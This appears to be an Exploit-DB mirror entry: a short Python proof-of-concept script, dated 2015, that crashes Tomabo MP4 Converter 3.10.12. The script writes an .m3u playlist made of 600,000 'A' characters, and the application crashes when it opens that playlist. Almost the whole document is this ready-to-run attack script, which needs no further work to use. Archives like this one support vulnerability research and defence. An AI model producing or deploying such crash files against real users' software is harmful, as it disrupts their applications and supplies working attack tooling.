exploit-db-mirror/exploits/windows_x86/dos/38444.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

16 lines
No EOL
412 B
Python
Executable file

#!/usr/bin/python
# Exploit Title: Tomabo MP4 Converter 3.10.12 - (.m3u) Denial of service (Crush application)
# Date: [8-10-2015]
# Exploit Author: [M.Ibrahim] vulnbug@gmail.com
# E-Mail: vulnbug <at> gmail.com
# Vendor Homepage: http://www.tomabo.com/mp4-converter/index.html
# Version: [3.10.12]
# Tested on: windows 7 x86
junk="A"*600000
file = "exploit.m3u"
f=open(file,"w")
f.write(junk);
f.close();